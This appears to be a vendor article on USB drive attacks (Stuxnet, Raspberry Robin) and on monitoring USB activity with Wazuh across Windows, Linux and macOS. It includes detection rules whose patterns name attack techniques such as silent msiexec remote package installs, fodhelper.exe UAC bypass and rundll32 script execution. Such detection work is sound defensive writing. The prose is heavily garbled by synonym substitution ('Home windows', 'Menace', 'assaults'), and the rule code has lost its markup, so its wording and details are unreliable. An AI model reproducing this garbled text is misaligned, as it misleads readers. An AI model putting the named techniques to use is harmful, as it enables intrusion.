USB drive assaults represent a big cybersecurity danger, benefiting from the on a regular basis use of USB gadgets to ship malware and circumvent conventional community safety measures. These assaults result in knowledge breaches, monetary losses, and operational disruptions, with lasting impacts on a corporation’s repute. An instance is the Stuxnet worm found in 2010, a malware designed to focus on industrial management programs, particularly Iran’s nuclear enrichment amenities. It exploited a number of zero-day vulnerabilities and unfold primarily by means of USB drives, making it one of many first examples of a cyberattack with real-world bodily results. Stuxnet uncovered the dangers of detachable media and raised world consciousness of cybersecurity threats to essential infrastructure.
How USB drive assaults propagate
Attackers use numerous strategies to ship malicious payloads by way of USB drives, focusing on people and organizations.
- Drop assaults: Contaminated USB drives are intentionally left in public areas, corresponding to parking heaps, to entice victims to plug them in and infect their computer systems.
- Mail-based assaults: USB drives are despatched to targets by way of mail, disguised as promotional objects or legit gadgets, to trick them into plugging them into their programs.
- Social engineering: Attackers use psychological ways to influence victims to attach contaminated USB drives to their computer systems.
- Unsolicited plugging: Attackers plug contaminated USB drives into unattended programs, spreading malware with out sufferer interplay.
How USB drive assaults work
USB drive assaults sometimes observe a multi-step course of to infiltrate programs and trigger harm.
- Reconnaissance: Attackers analysis their goal to establish potential vulnerabilities. On this case, they might collect details about the group, its staff, and its operational surroundings to find out the chance of somebody utilizing a USB drive.
- Weaponization: Menace actors put together the USB drive by embedding malware. This may be achieved by straight infecting the drive or crafting a seemingly benign file, corresponding to a doc, video, or picture, which comprises hidden malicious code.
- Supply: Attackers distribute the contaminated USB drive to targets by dropping it in public areas, giving it away as a promotional merchandise, or utilizing social engineering to ship it.
- Exploitation: When the goal connects to the USB drive, the malware is activated routinely or by means of consumer interplay, exploiting system vulnerabilities.
- Set up: The malware is put in on the goal system, gaining persistence. This step permits the attacker to keep up management of the contaminated gadget even whether it is rebooted or disconnected.
- Command and Management (C2): The malware communicates with the attacker’s server. This allows the attacker to challenge instructions, exfiltrate knowledge, or deploy further payloads.
- Actions on Goals: The attackers obtain their targets, corresponding to stealing delicate knowledge, deploying ransomware, or establishing persistent entry for future exploitation.
 |
| Determine 1: Steps exhibiting how USB Drive assaults work. |
Improve your cybersecurity posture towards USB drive assaults with Wazuh
Wazuh is an open supply safety platform that helps organizations detect and reply to safety threats by monitoring system actions, from informational occasions to essential incidents. Organizations can proactively stop breaches and safeguard delicate knowledge by monitoring USB exercise with Wazuh.
Monitoring USB drive actions in Home windows utilizing Wazuh
Wazuh displays USB drive actions on Home windows endpoints utilizing the Audit PNP Exercise characteristic. This characteristic logs Plug and Play (PnP) occasions, which helps establish when USB drives are linked. It’s obtainable on Home windows 10 Professional and Home windows 11 Professional, Home windows Server 2016, and later variations.
Organizations can configure Wazuh to detect particular system occasions and monitor USB-related occasions, significantly specializing in Home windows occasion ID 6416, which signifies when an exterior gadget is linked. Safety directors can detect USB gadget connections by creating Wazuh customized guidelines to establish potential safety incidents.
The following step consists of making a Fixed Database (CDB) of permitted gadgets’ distinctive gadget identifiers (DeviceID). This record permits Wazuh to distinguish between licensed and unauthorized gadgets, producing alerts for each classes. As an example, when a licensed USB drive is plugged in, it triggers a lower-level alert, whereas unauthorized connections can generate high-severity alerts that point out a possible safety breach.
 |
| Determine 2: USB drive plug-in occasions on a monitored Home windows endpoint. |
 |
| Determine 3: Approved USB drive occasion. |
 |
| Determine 4: Unauthorized USB drive occasion. |
Menace detection use case: Detecting the Raspberry Robin USB-Drive actions
Wazuh supplies an answer to mitigate USB-related threats, corresponding to Raspberry Robin, a Home windows-based worm.
Raspberry Robin targets industries like oil, gasoline, transportation, and tech, inflicting operational disruptions. It spreads by way of disguised .lnk information, positive factors persistence by updating the UserAssist registry, and mimics legit folders. The worm makes use of legit Home windows processes corresponding to msiexec.exe, rundll32.exe, odbcconf.exe, and fodhelper.exe to execute, persist, and obtain further malicious parts. Its reliance on TOR-based command and management (C2) servers for outbound communication provides stealth and complicates detection.
Wazuh detects Raspberry Robin by monitoring registry modifications, uncommon command execution patterns, and suspicious system binaries use. Its real-time file integrity monitoring and menace detection guidelines establish malicious exercise, enabling swift response to mitigate potential disruptions.
Wazuh detects and mitigates Raspberry Robin by monitoring and responding to suspicious exercise like:
- Anomalous cmd.exe actions: terminating suspicious processes or isolating affected endpoints.
- Flagging msiexec.exe downloads from obscure domains, blocking connections, and alerting directors.
- Detecting UAC bypass by way of fodhelper.exe, terminating the method, and notifying directors.
- Blocking uncommon outbound connections by rundll32.exe and dllhost.exe.
Under is a pattern customized rule configuration that detects doable Raspberry Robin actions.
92004
(?i)cmd.exe$
(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd
Doable Raspberry Robin execution on $(win.system.pc)
T1059.003
61603
(?i)msiexec.exe$
(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+[.msi]{0,1}
msiexec.exe downloading and executing packages on $(win.system.pc)
T1218.007
61603
(?i)(cmd|powershell|rundll32).exe
(?i)fodhelper.exe
Use of fodhelper.exe to bypass UAC on $(win.system.pc)
T1548.002
61603
(regsvr32.exe|rundll32.exe|dllhost.exe).*";doc.write();GetObject("script:.*).Exec()
Doable Raspberry Robin execution on $(win.system.pc)
T1218.011
 |
| Determine 5: Raspberry Robin IoCs and behaviors detected on a monitored Home windows endpoint. |
 |
| Determine 6: An alert exhibiting the Raspberry Robin IoCs detected on a monitored Home windows endpoint. |
For extra particulars on detecting the Raspberry Robin worm utilizing Wazuh, please go to this weblog.
Monitoring USB drives in Linux utilizing Wazuh
USB drives may introduce safety dangers to Linux endpoints as potential vectors for malware and unauthorized knowledge entry. udev is a system utility on Linux that routinely detects and manages exterior gadgets, corresponding to USB drives, when plugged in. It creates the required gadget information within the /dev listing in order that the system can work together with them. Directors can create customized udev guidelines that generate detailed occasions, offering insights into USB exercise. Wazuh has built-in guidelines for USB monitoring, however udev-generated occasions present richer particulars, enhancing menace detection.
We configure udev guidelines on our Linux endpoints to set off a logging script every time a USB gadget is linked. The Wazuh agent should be set as much as learn the generated JSON log file produced from the logging script, permitting it to course of and analyze USB exercise.
Just like the Home windows USB drive monitoring, you want a continuing database (CDB) record of licensed USB gadget serial numbers. Wazuh will evaluate incoming connections towards this record, triggering alerts for unauthorized gadgets.
 |
| Determine 7: USB drive alerts for a monitored Linux endpoint. |
 |
| Determine 8: An unauthorized USB drive occasion on a monitored Linux endpoint. |
The weblog publish on Monitoring USB drives in Linux utilizing Wazuh supplies extra info on monitoring USB drives plugged into Linux endpoints.
Monitoring USB drives in macOS utilizing Wazuh
You should use a customized script to log essential occasions associated to USB gadgets on macOS endpoints after which configure Wazuh to watch these occasions. Directors can extract info corresponding to connection and disconnection occasions, vendor IDs, product IDs, and serial numbers of USB drives plugged in. This script interacts with macOS’s I/O Package framework to collect USB gadget info, which is then formatted as JSON and saved to a log file. The log knowledge generated from this tradition script is shipped to the Wazuh server for evaluation utilizing the Wazuh agent.
The weblog publish on Monitoring USB drives in macOS utilizing Wazuh exhibits the steps to watch USB drives on macOS endpoints.
 |
| Determine 9: USB drive alerts on a monitored macOS endpoint. |
 |
| Determine 10: Unauthorized USB drive alert on a monitored macOS endpoint. |
Conclusion
USB drive assaults pose a safety danger throughout main working programs, enabling malware propagation and unauthorized entry to malicious actors.
Wazuh presents numerous detection mechanisms to extend the probabilities of detecting USB Drive assaults and mitigate the potential impression. Organizations can improve cybersecurity by integrating these detection strategies and imposing strict USB entry insurance policies.